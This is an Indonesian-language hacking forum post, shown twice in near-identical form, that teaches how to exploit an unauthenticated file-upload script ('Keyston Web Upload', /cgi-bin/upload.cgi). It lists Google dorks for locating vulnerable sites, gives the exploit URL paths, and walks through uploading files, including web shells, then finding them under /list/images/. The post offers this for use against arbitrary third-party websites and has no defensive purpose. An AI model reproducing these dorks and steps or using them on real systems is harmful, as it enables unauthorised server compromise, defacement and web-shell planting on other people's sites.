Mapp sebelum nya kalo Thread ane ngak mutu...
Buat para mastah mendingan ngak usah di baca..!!
sekedar share..
Dork :
- intitle:Keyston Web Upload inurl:/cgi-bin/
- intext:by PA Visitors Network
Exploit :
- http://target.com/cgi-bin/upload.cgi
- http://target.com/path/cgi-bin/upload.cgi
Exploit by [URL="http://www.exploit-id.com"]Exploid-id[/URL]
1. Cari target pake Tool terampuh di dunia yaitu Om Google, dengan memasukan Dork diatas pada field pencarian.
2. Setalah mendapat target. " ex: http://target.com/cgi-bin/upload.cgi " Maka kita akan di bawa pada sebuah halam untuk mengupload file.!! seperti penampakan di bawah ini.
Buat ngeliat file kalian yang telah di upload. setelah prosess penguploadtan file selesai...maka nama file kalian akan tampil pada direktori list seperti gambar di atas..atau kalian juga bisa mencek nya dengan merubah URL seperti.
http://target/list/images/namafilekamu.html or .php
Buat yang ngupload shell silahkan jumping aja...
Maap kalo salah...mohon di koreksi...
maklum ane masih :newbie:
Semoga POC yang ane berikan dapat dan mudah dimengerti..
Buat para mastah mendingan ngak usah di baca..!!
sekedar share..
Dork :
- intitle:Keyston Web Upload inurl:/cgi-bin/
- intext:by PA Visitors Network
Exploit :
- http://target.com/cgi-bin/upload.cgi
- http://target.com/path/cgi-bin/upload.cgi
Exploit by [URL="http://www.exploit-id.com"]Exploid-id[/URL]
1. Cari target pake Tool terampuh di dunia yaitu Om Google, dengan memasukan Dork diatas pada field pencarian.
2. Setalah mendapat target. " ex: http://target.com/cgi-bin/upload.cgi " Maka kita akan di bawa pada sebuah halam untuk mengupload file.!! seperti penampakan di bawah ini.
- Spoiler:
Buat ngeliat file kalian yang telah di upload. setelah prosess penguploadtan file selesai...maka nama file kalian akan tampil pada direktori list seperti gambar di atas..atau kalian juga bisa mencek nya dengan merubah URL seperti.
http://target/list/images/namafilekamu.html or .php
Buat yang ngupload shell silahkan jumping aja...
Maap kalo salah...mohon di koreksi...
maklum ane masih :newbie:
Semoga POC yang ane berikan dapat dan mudah dimengerti..